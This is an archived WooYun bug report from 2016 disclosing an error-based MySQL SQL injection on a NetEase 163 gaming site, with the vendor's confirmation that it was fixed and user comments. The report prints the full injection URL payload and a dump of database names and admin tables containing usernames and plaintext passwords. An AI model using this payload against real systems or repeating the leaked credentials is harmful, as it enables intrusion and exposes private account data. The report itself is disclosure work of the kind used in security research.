破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

网易163某站点MySQL报错注入

编号191354
Urlhttp://www.wooyun.org/bug.php?action=view&id=191354
漏洞状态厂商已经确认
漏洞标题网易163某站点MySQL报错注入
漏洞类型SQL注射漏洞
厂商网易
白帽子lijiejie
提交日期2016-04-01 12:49:00
公开日期2016-05-20 13:40:00
修复时间(not set)
确认时间2016-04-05 00:00:00
Confirm Spend4
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank12
厂商评级
厂商评rank8
漏洞简介
网易163某站点MySQL报错注入
漏洞细节

http://play.163.com/m/ajax?api=wapTopicListApi&idNotIn=1) AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x5e5e5e,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,54)),0x5e5e5e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1=1&page=2&pageSize=20&topic=%E6%89%8B%E6%B8%B8%E9%A2%91%E9%81%93


参数idNotIn可以注入,MySQL报错注入

play.163.com.sqli.png

POC

available databases [77]:
[*] analytics
[*] diablo3db
[*] gamesearch
[*] gamezoo
[*] herofire_cn
[*] information_schema
[*] product
[*] product_newgame
[*] tianyu
[*] worldhero


Database: gamezoo
Table: admin_user
[1 entry]
+----+-----------------+------------+---------------------+---------------+-----
----------------+
| id | password | user_name | create_time | super_manager | modi
fied_time |
+----+-----------------+------------+---------------------+---------------+-----
----------------+
| 1 | admin_hedy123$_ | admin_hedy | 2014-04-01 14:16:00 | 1 | 2014
-04-01 14:16:00 |
+----+-----------------+------------+---------------------+---------------+-----
----------------+


Database: product
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 336 |
+-------+---------+


Database: tianyu
Table: a_admin_user
[2 entries]
+----+---------+---------+-------------------+-----------+-----------+----------
---+--------------+-----------------+-----------------+-------------------+-----
--------------+
| id | email | address | password | real_name | telephone | user_name
| mobile_phone | create_time_ymd | create_time_hms | modified_time_ymd | modi
fied_time_hms |
+----+---------+---------+-------------------+-----------+-----------+----------
---+--------------+-----------------+-----------------+-------------------+-----
--------------+
| 1 | <blank> | <blank> | admin_hedy_123$_1 | <blank> | <blank> | admin_hed
y | <blank> | 0 | 0 | 0 | 0
|
| 2 | <blank> | <blank> | shenyunqing321$_ | <blank> | <blank> | shenyunqi
ng | <blank> | 0 | 0 | 0 | 0
|
+----+---------+---------+-------------------+-----------+-----------+----------
---+--------------+-----------------+-----------------+-------------------+-----
--------------+

修复方案

参数过滤,转义

状态信息 2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开
厂商回复泄露的数据以资讯类数据为主,目前漏洞已修复。感谢您对网易的关注。
回应信息危害等级:中漏洞Rank:8 确认时间:2016-04-05 13:38
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

@lanyan 666

小哲哥02016-04-04 20:12:00

@小哲哥 我的是金刚葫芦娃~

lanyan02016-04-02 17:14:00

好基友刚分享了我一套52G葫芦娃

小哲哥02016-04-01 15:34:00

163裤子满天飞了现在_(:з」∠)_

CCkerber02016-04-01 15:11:00

就是姐姐干的,哈哈

LoveSnow02016-04-01 14:23:00

应该是了。

sysALong02016-04-01 12:57:00

这么多网易。。李姐姐,我都怀疑网易是你黑的了。。

随风的风02016-04-01 12:55:00